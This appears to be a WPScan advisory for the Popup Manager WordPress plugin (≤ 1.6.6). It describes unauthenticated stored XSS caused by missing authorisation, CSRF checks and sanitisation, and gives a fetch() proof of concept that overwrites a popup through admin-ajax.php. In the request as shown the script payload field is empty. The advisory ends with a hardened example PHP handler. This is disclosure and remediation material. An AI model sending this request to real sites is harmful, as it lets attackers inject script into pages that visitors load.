wpvulndb | Lana Codes | WPVDB-ID: 7862084A-2821-4EF1-8D01-C9C8B3F28B05
History: Nov 28, 2022 - 12:00 a.m.

Popup Manager <= 1.6.6 - Unauthenticated Stored XSS

wpscan.com
7
Tags: popup manager, unauthenticated, stored xss, csrf, sanitisation, authorization, security threat

EPSS: 0.001
Percentile: 39.7%

The plugin does not perform authorisation or CSRF checks when creating/updating popups, and is missing sanitisation as well as escaping, which could allow unauthenticated attackers to create arbitrary popups and add Stored XSS payloads as well.

PoC

    fetch('/wp-admin/admin-ajax.php', {
      method: 'POST',
      headers: new Headers({
        'Content-Type': 'application/x-www-form-urlencoded',
      }),
      body: 'action=pm_save_data&form_action=update&form_id=1&form_name=vulnerability&form_data={"form_action":"undefined","popup_template":"text","popup_template_style":"","popup_location":"modal-popup","popup_timer":"0","popup_trigger":"timer","popup_entry_animation":"bounce","popup_exit_animation":"bounce","popup_title":"XSS","popup_disclaimer":"Try XSS","popup_text":"vulnerable"}&popup_html=',
      redirect: 'follow'
    })
      .then(response => response.text())
      .then(result => console.log(result))
      .catch(error => console.log('error', error));

This exploit script replaces the HTML of popup #1 with a script tag.
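For comparison, a handler for the same `pm_save_data` action with the four missing controls in place (authorisation, CSRF check, sanitisation on input, escaping on output). This is an added example, not the plugin's code or its actual fix: the function names, nonce action, capability choice and option key are hypothetical, and only the action name and the `form_id`, `form_name` and `popup_html` fields come from the request above. It assumes it is loaded inside WordPress as plugin code.

```php
<?php
// Added example; all pm_example_* names and the option key are hypothetical.

// Register the authenticated hook only. With no wp_ajax_nopriv_ counterpart,
// admin-ajax.php does not dispatch this action for logged-out callers.
add_action( 'wp_ajax_pm_save_data', 'pm_example_save_data' );

function pm_example_save_data() {
    // CSRF: require a nonce issued to the admin form; ends the request on failure.
    check_ajax_referer( 'pm_example_save', 'nonce' );

    // Authorisation: only users who may manage the site can edit popups
    // (capability chosen for this example).
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // Sanitisation on input: integer id, plain-text name, and HTML limited
    // to the post allow-list, which drops <script> and event-handler attributes.
    $id   = isset( $_POST['form_id'] ) ? absint( $_POST['form_id'] ) : 0;
    $name = isset( $_POST['form_name'] )
        ? sanitize_text_field( wp_unslash( $_POST['form_name'] ) ) : '';
    $html = isset( $_POST['popup_html'] )
        ? wp_kses_post( wp_unslash( $_POST['popup_html'] ) ) : '';

    if ( 0 === $id ) {
        wp_send_json_error( 'invalid id', 400 );
    }

    update_option( 'pm_example_popup_' . $id, array( 'name' => $name, 'html' => $html ) );
    wp_send_json_success( array( 'id' => $id ) );
}

// Escaping on output: treat stored values as untrusted even after input
// filtering, so rows written before the fix cannot execute script.
function pm_example_render_popup( $id ) {
    $popup = get_option( 'pm_example_popup_' . absint( $id ) );
    if ( ! is_array( $popup ) ) {
        return '';
    }
    return '<div class="pm-example-popup" title="' . esc_attr( $popup['name'] ) . '">'
        . wp_kses_post( $popup['html'] ) . '</div>';
}
```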
